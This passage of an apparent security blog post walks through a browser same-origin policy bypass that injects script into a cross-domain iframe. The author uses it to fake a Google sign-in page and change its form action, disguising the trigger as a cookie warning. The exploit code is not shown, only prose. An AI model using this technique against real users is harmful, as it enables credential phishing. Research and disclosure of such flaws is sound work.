However, a single page without "X-Frame-Options" in the domain is enough for us, and this is not as difficult to find as it seems. There are two well-known resources that aren't protected on most websites: robots.txt (the one used by the original author) and favicon.ico (I used that one because it looks better for a practical attack).

There is a function called "go()" that performs the real exploitation. It's difficult to read, so let me decode it for you.


This is where the interesting things happen. There are some "alert" and "eval" calls that seem to be important. I couldn't figure out why, but if you change them it won't work. This is the tricky part of this vulnerability.

It gets the second iframe that we were talking about before and stores it in a variable "x". Then it waits a few seconds (1 second in the code) and shows an alert message. As I previously said, that alert seems to be important, so we can't remove it, but we can use a message that won't warn the user that something bad is about to happen. After that, when the first iframe has already changed from my evil domain to the target domain (because of 1.php), a piece of JavaScript and HTML code is injected into that second iframe. We shouldn't be able to do that, because it's a different domain, but we are. The same-origin policy has been bypassed.

Let's see what a victim would see:


Some countries have specific laws about cookies, and a warning message is required on most websites, so users are used to clicking "OK".


When I injected the JavaScript and HTML code into the iframe, I used a Google button. It isn't the most beautiful blog, but well... it looks like a real blog :)


The Google authentication page is opened. Everything looks fine, but I have changed the form action using the injected JavaScript code.


Done! A really cool vulnerability. I can't wait for more details about it. Let's see if in a few days we learn why "alert", "eval" and "setTimeout" are as important as they seem to be.